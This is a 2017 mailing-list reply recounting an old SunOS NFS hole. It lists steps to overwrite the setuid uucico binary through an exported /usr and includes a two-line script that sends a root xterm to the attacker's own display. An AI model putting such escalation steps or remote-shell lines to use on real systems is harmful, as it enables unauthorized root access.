29 Sep
2017
29 Sep
'17
11:24 p.m.
There was also a horrible bit of backdoor-ism that was exploitable with
NFS on SunOS - and was there for at least 4.1.3 but I imagine it was
around for a long time.
If the /usr filesystem was exported, and you were either a "known host"
or it was exported to (everyone) (and yes, there were a LOT of people
that did this)...
Mount it locally, become root, su - uucp, and go and change the mode on
/usr/lib/uucp/uucico (which was owned by uucp) from setuid to writable.
Overwrite with your binary or script of choice.
Telnet to the exploited host, and /usr/lib/uucp/uucico was executed as root.
I usually used:
#!/bin/sh
/usr/openwin/bin/xterm -display <myhost>:0
I used this on a WAN back in the 90's - actually to reset a lost root
password for someone, but also to poke around sometimes ;)
I don't know why people exported /usr - but they did it a lot.
On 9/29/2017 2:40 PM, Don Hopkins wrote:
I was able to nfs-mount a directory on one of
cs.cmu.edu's servers from sun.com’s network with no problem. Ron may remember me
warning him about that!
-Don